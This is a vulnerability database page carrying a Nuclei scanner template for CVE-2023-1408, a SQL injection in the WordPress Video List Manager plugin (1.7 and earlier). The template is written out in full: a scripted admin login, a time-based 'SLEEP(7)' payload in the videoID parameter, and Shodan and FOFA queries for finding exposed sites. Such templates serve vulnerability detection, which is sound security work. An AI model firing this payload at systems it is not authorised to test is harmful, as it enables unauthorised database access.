Lucene search
K

Video List Manager <= 1.7 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Video List Manager <= 1.7 - SQL Injection. Plugin vulnerable to SQL injection allowing high privilege user exploitation

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin Video List Manager SQL注入漏洞
8 May 202300:00
cnnvd
CVE
CVE-2023-1408
8 May 202313:58
cve
Cvelist
CVE-2023-1408 Video List Manager <= 1.7 - Admin+ SQL Injection
8 May 202313:58
cvelist
NVD
CVE-2023-1408
8 May 202314:15
nvd
OSV
CVE-2023-1408
8 May 202314:15
osv
Patchstack
WordPress Video List Manager Plugin <= 1.7 is vulnerable to SQL Injection
25 Apr 202300:00
patchstack
Prion
Sql injection
8 May 202314:15
prion
Positive Technologies
PT-2023-16964 · WordPress · Video List Manager
8 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-1408
23 May 202502:59
redhatcve
Vulnrichment
CVE-2023-1408 Video List Manager <= 1.7 - Admin+ SQL Injection
8 May 202313:58
vulnrichment
Rows per page
id: CVE-2023-1408

info:
  name: Video List Manager <= 1.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
  impact: |
    Authenticated high-privilege attackers (admin) can exploit SQL injection through the videoID parameter to extract database contents, potentially stealing user credentials, video metadata, and compromising the WordPress database.
  remediation: |
    Update Video List Manager plugin to a version newer than 1.7 that uses parameterized queries or prepared statements for the videoID parameter in admin.php.
  reference:
    - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
    - https://wordpress.org/plugins/video-list-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1408
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-1408
    cwe-id: CWE-89
    epss-score: 0.03229
    epss-percentile: 0.86725
    cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: video_list_manager_project
    product: video_list_manager
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/video-list-manager/
    fofa-query: body=/wp-content/plugins/video-list-manager/
    publicwww-query: /wp-content/plugins/video-list-manager/
  tags: time-based-sqli,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 15s
        GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 200'
          - 'contains_all(body_2, "Edit Video","Youtube</option>")'
        condition: and
# digest: 4a0a004730450221008ce59b7b5a0a3be2acf8a8657619c17c0dc47d18c3593d9712f753d2f39d737602203376f8f2bf9f42e5280fbcca303a971b3c16f10335f22d6cbbbb2347a7d0a002:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.2
EPSS0.03229
SSVC
34